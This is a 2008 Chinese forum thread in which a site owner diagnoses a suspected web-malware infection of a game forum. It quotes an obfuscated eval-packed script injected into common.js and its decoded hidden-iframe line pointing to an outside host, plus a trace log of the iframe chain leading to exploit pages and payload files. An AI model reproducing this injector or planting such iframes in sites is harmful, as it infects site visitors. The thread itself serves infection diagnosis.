求教，是不是被人挂马了？

显示全部楼层 · 发表于 2008-11-25 19:10:12

卡巴测试脚本启发引擎，不用等毒下来。

显示全部楼层 · 发表于 2008-11-25 19:24:16

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<meta name="robots" content="index,follow">
<meta name="keywords" content="冷月山庄">
<meta name="generator" content="Discuz! 2.0 <b style='color: #FF9900'>COML</b> with Templates 2.0">
<meta name="description" content="冷月山庄游戏论坛">
<meta name="MSSmartTagsPreventParsing" content="TRUE">
<meta http-equiv="MSThemeCompatible" content="Yes">
<title>冷月山庄</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p align="center"><font size="5">冷月山庄<STRONG><FONT
   face="Verdana, Arial, Helvetica, sans-serif"
   color=#cc0000> 论坛</FONT></STRONG></font></p>
<p align="center"> </p>
<FORM name=loading>
<DIV align=center>
<P>
<INPUT
style="font-weight: bolder; color: #7C7777; font-family: Arial; background-color: #ffffff; border-style: solid; border-color: #FFFFFF; padding: 0px"
size=46 name=chart>
<BR>
   <input
style="color: #000000; text-align: center; background-color: #FFFFFF; border-style: solid; border-color: #FFFFFF"
size=43 name=percent>
   <SCRIPT language="">

var bar = 0
var line = "||"
var amount ="||"
count()
function count(){
bar= bar+2
amount =amount + line
document.loading.chart.value=amount
document.loading.percent.value=bar+"
if (bar<99)
{setTimeout("count()",4);}
else
{window.location = "http://www.lengyuesz.com/bbs";}
}
</SCRIPT>
</P>
</DIV></FORM>

显示全部楼层 · 发表于 2008-11-25 19:51:37

想进一步学习，怎样才能找到木马被放在哪里？

显示全部楼层 · 发表于 2008-11-26 16:35:33

靠，这次找到了。。。
还是在http://www.lengyuesz.com/bbs/include/javascript/common.js脚本里面有一句eval加密：

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.d(\'<7 4=0 c=1 a="6://9.2/8/b.5"></7>\')',62,14,'|100|cn|document|height|htm|http|iframe|files|teachername|src|face|width|writeln'.split('|'),0,{}));

解密后的代码为：

document.writeln('<iframe height=0 width=100 src="http://teachername.cn/files/face.htm"></iframe>')

freshow日志：

Log is generated by FreShow.
[wide]http://www.lengyuesz.com/bbs
[script]http://www.lengyuesz.com/include/javascript/common.js
      [frame]http://teachername.cn/files/face.htm
         [frame]http://baidu-dudouai2.cn/b082222/b08.htm
            [frame]http://baidu-dudouai2.cn/b082222/new.html
                  [frame]http://baidu-dudouai2.cn/b082222/../14.htm
                     [object]http://qq.18i16.net/exe1/ms.css
                  [frame]http://baidu-dudouai2.cn/b082222/fx.htm
                     [frame]http://baidu-dudouai2.cn/b082222/mlink.html
                     [frame]http://baidu-dudouai2.cn/b082222/xlink.html
                  [frame]http://baidu-dudouai2.cn/b082222/../as.htm
                     [object]http://qq.18i16.net/exe1/ce.css
                  [frame]http://baidu-dudouai2.cn/b082222/lzz.htm
                     [object]http://qq.18i16.net/exe1/b08.css
                  [frame]http://baidu-dudouai2.cn/b082222/real11.htm
                     [object]http://qq.18i16.net/exe1/b08.css
                  [frame]http://baidu-dudouai2.cn/b082222/../real10.htm
                     [object]http://qq.18i16.net/exe1/re.css
                  [frame]http://baidu-dudouai2.cn/b082222/../Bfyy.htm
                     [object]http://qq.18i16.net/exe1/bf.css

那个common.js老是不稳定，时有时无的，不知为何。

显示全部楼层 · 发表于 2008-11-26 18:44:02

谢谢，我最近也发现有时杀毒软件报，有时有不报了

[病毒样本] 求教，是不是被人挂马了？

本帖子中包含更多资源

首页未发现问题！

回复 14楼 lg560852 的帖子